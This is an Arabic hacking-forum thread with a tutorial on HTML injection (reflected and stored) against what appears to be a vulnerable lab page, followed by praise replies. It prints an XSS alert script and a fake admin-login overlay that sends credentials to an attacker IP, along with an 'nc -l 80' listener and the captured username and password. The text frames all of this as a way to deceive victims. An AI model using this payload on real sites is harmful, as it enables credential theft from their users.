1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

الموضوع في '[ SQL-injection ]' بواسطة Red-StOnE, بتاريخ ‏6 يوليو 2015.

كاتب الموضوع : Red-StOnE المشاهدات : 810 الردود : 11 ‏6 يوليو 2015
حالة الموضوع:
مغلق
  1. غير متصل

    Red-StOnE
    rankrank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    [​IMG]

    بسم الله الرحمن الرحيم

    السسلآم علــيكم ورحمة الله وبركآته

    الصلاة و السلام على اشرف المرسليـن

    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره

    و نعود بالله من شرور أنفسنا و من سيئات أعمالنا

    من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا

    ... و أشهد ألا إله إلا الله وحده لا شريك له

    و أن محمداً عبده و رسوله صلى الله عليه و سلم

    [​IMG]

    شلونكم شخبآركم [ آعضآء عراق تيم ] بخير آن شآء آلله

    [[​IMG]] نبدآء على بركة آلله سبحآنه [[​IMG]]

    Html code injection Post-Get-StoredData

    نتكلم اليوم عن ثغرات HTML INJECTION وذلك عن طريق حقن

    كود HTML بالمدخل او المتغير المصاب ومحاولة استغلالها بعده طرق,


    [​IMG]

    [​IMG]

    بالاول ناخذ تعريف عن [ HTML = [HyperText Markup Language

    تعني لغة توصيف النص التشعبي:
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    بالعادة لغة توصيف النص التشعبي تكون بالدرجة الاولى

    في تصميم وتوظيف قوالب والنصوص. في الويب ابلكيشن وهاذا شيء طبيعي جدا. ولكن تكمن ثغراتها

    في تحقق المدخلاات مثلها مثل اي ثغرة اخرى في الويب ابلكيشن. اي لنفرض بأن لدي صفحه في موقع

    معين مبني على HyperText Markup Language بالكامل ولديه مدخل بأسم ["Search"] وليس عليه تحقيق

    او فلتره للمدخل في هالحاله تكمن الاصابة، ولكن تختلف المعاير في طريقة الارسال والاستقبال الحزم.

    وعندما اعني تختلف في الارسال اي اعني في الطلب والاستقبال من خلال طرق الارسال

    Hypertext] Transfer Protocol ]= Http. وكما تسمى Http Method&*Http Verbs/

    وهي في الغالب تكون مابين اثنين اكثر انتشار وهم Get^ & ^POST.

    اكثر المدخلات تقوم بالاستعلام من خلال Http method من خلال

    get and post وتكون في العادة إقل خطورة من

    [Stored html injection] = اي تكون مربوطه وا مخزنه في قاعدة بايانات

    وذلك من خلال ربط المعلومات بستخدام لغةاخرى

    مع [ Server side language -Html مثل PHP,JAVASCRIPT, ASP.NET, JSP...

    وذلك من خلال استدعاء البي اتش بي من /.html

    بعد ماخذنا تعريف بسيط وجزيء عن الثغرات وكيفيه حدوثها

    لناخذ الان الاعراض والنتائج للثغرات مع امثله.

    في الحقيقة ثغرات Html لايستهان فيها ابدا من اعراضها بالامكان

    حقن كود جافا سكربت خبيث داخل كود html وينتج عن ثغرة [XSS] وأكثر.

    وايضا يستفاد منها في اكثر من هجمة او ثغرة مثل [Clickjacking &IFarme

    وكذلك الحصول على معلومات حساسة جدا مثل اليوزر والباسورد[User/ password sniffing] .

    الان نتجهه للتطبيق العملي لكل واحدة منهم.

    1- Get /request Html code injection

    في البداية للنظر داخل الكود ونحلل من ثم نطبق >.

    [​IMG]

    [​IMG]
    [​IMG]

    [​IMG]


    [​IMG]

    كما نلاحظ من الصورة نلاحظ الاسم الاول والاسم الاخير

    First name ^ last name يتم التحقق منها والطباعه

    من خلال Echo وهو دلة الطباعة من غير فلتره ولاتحقق.

    كما ذكرت سابقا Html injection وا xss عملتان لوجه واحد.

    الان بعد التأكد والاتضاح بوجود ثغرة نأتي الان للاستغلال نتابع.

    في البداية نستعلام عن كود html بسيط وهو
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    في لغة html

    نكتفي بتأكيد من خلال، <h1></h1>


    [​IMG]

    [​IMG]

    [​IMG]

    كما نلاحظ تاق الهيدر جاب نتيجه، الان في هالحالة بالامأكن بكتابه كود html مع جافا سكربت

    وسحب الكوكيز ولكن تكون من نوع reflected xss بحكم دنماكيه الصفحة. وذلك يتطلب الهندسه الاجتماعيه

    وايضا بعض من الصبر في هالنوع من الهجمات من حيث يتطلب الارسال

    رابط الصفحه للضحيه والاقناع حتى يضغط على الصفحة.

    لناخذ مثال بحقن كود html بداخله Javascript ونستعرض من خلال الكود التألي

    كود PHP:
    <html>
    <
    body>
    <
    h1>Lodaing xss</h1>
    <
    script>
    for(var 
    i=1i<=12i++) {
    alert("r3m0tnu11"+i+" Xss+html")
    }
    </
    script>
    <
    h1>…well Done !</h1>
    </
    body>
    </
    html>
    [​IMG]

    [​IMG]

    2- Post /request Html code injection

    لاتفرق مع get سوا فقط دنماكية الارسال/////

    3- <Stored code injection] MySQL USING PHP


    الان نأتي الا اهم واخطر نوع من ثغرات html والتي تكون مربوطه بالقاعده

    من خلال الاستدعاء بالبي اتش بي اولا ثم للغة البي اتش بي تتصل

    بالقاعدة ثانيا هاكذا يتم ربط المعلومات بين

    html&mysql يكون الوسيط مابينهم هو php على كل حال.

    لناخذ مثال .

    [​IMG]

    [COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][IMG]http://img110.xooimage.com/files/a/5/f/04-486c554.png[/IMG]

    خلونا نشوف الكود البرمجي للصفحة ونشوف المشكلة

    [IMG]http://img110.xooimage.com/files/f/4/f/10-4be90cd.jpg[/IMG]

    [IMG]http://img110.xooimage.com/files/1/c/8/11-4be90cf.jpg[/IMG]

    [IMG]http://img110.xooimage.com/files/b/9/0/13-4be90d3.jpg[/IMG]
    [IMG]http://img110.xooimage.com/files/8/7/c/14-4be90d5.jpg[/IMG]
    [/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]

    [COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][IMG]http://img110.xooimage.com/files/a/5/f/04-486c554.png[/IMG]

    الان كما نلاحظ الاستعلام يكون من خلال post ثم يقوم بدخال قيمه المدخلات

    للبي اتش بي ومن ثم ارسالها للماي سيكول للتطابق على المعطيات على كل حال، عرفنا انه الصفحه

    مصابة من خلال echo من دون فلتره وايضا عرفنا بأن المعلومات المدخله تتخزن.

    وهاذا يعني لانحتاج للهندسه العكسية والتحايل والخ،،،.

    فقط نضع الحقنه وننتظر النتآئج سوا كان كود خبيث جافا سكربت يقوم بسحب الكوكيز

    او باستبدال الصفحه الموجوده بصفحه نقوم احنا

    بوضعها وتتبدل بدل الصفحه القديمه بحكم انها مخزنه لناخذ مثال والاستغلال.

    [IMG]http://img110.xooimage.com/files/5/2/4/15-4be90d7.jpg[/IMG]

    [IMG]http://img110.xooimage.com/files/6/5/e/16-4be913f.jpg[/IMG]

    [IMG]http://img110.xooimage.com/files/2/8/d/17-4be913d.jpg[/IMG]

    [IMG]http://img110.xooimage.com/files/1/7/1/18-4be9136.jpg[/IMG]

    تمام الان عرفنا بأن الملف مصاب.

    ولكن ماذا نعمل الان. الان بالامكان

    بحقن صفحه نضع فيها يوزر وباسورد للدخول لليهام

    الضحيه بأن يتطلب عليه تسجيل معلومات الادمن للسكربت والباس.

    ومن ثم نستقبل المعلومات من النت كات والتنصت . لناخذ

    مثال لحقن كود يوهم الضحيه .html

    [IMG]http://img110.xooimage.com/files/1/a/2/19-4be9143.jpg[/IMG]

    [/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]
    [COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][IMG]http://img110.xooimage.com/files/a/5/f/04-486c554.png[/IMG]

    [PHP]<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000;
    background-color:white; padding: 1em;">
    Admin Username and password are required please log in.:<br><form name="login"
    action="http://IP:80"><table>
    <tr><td>Username:</td><td><input type="text" name="username"/></td>
    </tr><tr><td>Password:</td><td><input type="password" name="password"/></td>
    </tr><tr><td colspan=2 align=center><input type="submit" value="Login"/>
    <td></tr></table></form></div>[/PHP]

    [IMG]http://img110.xooimage.com/files/d/4/d/20-4be9149.jpg[/IMG]

    نقوم بتغير بالالون الاحمر ووضع الاي بي تبعنا والبورت 80

    ومن ثم التنصت على البورت 80

    [COLOR=Red]nc -l 80[/COLOR]

    [IMG]http://img110.xooimage.com/files/2/1/c/21-4be9153.jpg[/IMG]

    [CODEE] والناتج
    GET /?username=r3m0tnu11&password=r3m0t3null%7E0x00&security_level=0 HTTP/1.1
    Host: *
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:34.0) Gecko/20100101 Firefox/34.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ar,en-us;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://*htmli_stored.php
    Connection: keep-alive[/CODEE]

    [IMG]http://img110.xooimage.com/files/6/7/3/22-4be9155.jpg[/IMG]
    [/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]

    [COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][COLOR=RoyalBlue][IMG]http://img110.xooimage.com/files/a/5/f/04-486c554.png[/IMG]

    [/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]
    ورمضضآأنن كريمم ، $

    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    Red-StOnE
    rankrank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    تم ارفاق شرح للموضوع بصيغة html لضمان بقاء الموضوع
     

    الملفات المرفقة:

    • index.zip
      حجم الملف:
      4.1 ك. ب
      المشاهدات:
      9


  3. غير متصل

    Crazy BoOoy
    rankrank
    Developer

    عضو منذ:
    ‏1 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب


    تسلم أيدك على الطرح واصل ولا تحرمنا من جديدك ..

    جارى القيام بالواجب + تحياتى لك ..
     


  4. غير متصل

    AnTar KsA
    rankrank
    Developer

    عضو منذ:
    ‏5 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    ما شاء الله عليك مبدع
     


  5. غير متصل

    nasern
    Active DeveloPer

    عضو منذ:
    ‏26 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    متابع لك يابطل تسلم ايدك
     


  6. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    أحسنت يابطل
    شرح متعوب عليه بارك الله بك ياغالي
    تم تقييمك و تقييم الموضوع
    .aًُoً..aًُoً..aًُoً..aًُoً..aًُoً.
     


  7. غير متصل

    slaizer مشرف أختبار الأختراق
    V • I • P

    عضو منذ:
    ‏29 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    553
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    موضوع جميل واصل الابداع [​IMG][​IMG][​IMG][​IMG]
     


  8. غير متصل

    غاوي هكر
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    يسلمو هل الايادي والله شرح متعوب عليه بصراحة
     


  9. غير متصل

    مصطفى الموسوي
    V • I • P

    عضو منذ:
    ‏5 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    789
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    السلام عليكم ورحمة الله وبركاتة
    عاشت الانامل الذي كتبت هذا الموضوع
    تم قصفك بالخماسي
    :ُie1:
    تحياتي لك ياوردة
    :ُeُeِq:​
     


  10. غير متصل

    غاوي هكر
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات html injection تفصيل الثغره + حقن كود html بالمدخل او المتغير المصاب

    ما شاء الله عليك يا جدع ياين الموضوع متعوب عليه ويعطيك الف عافية

    بس انا كنت مفضل انو يكون الموضوع فيديو افضل هاد رايي الشخصي

    بووووركت يا عسل
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...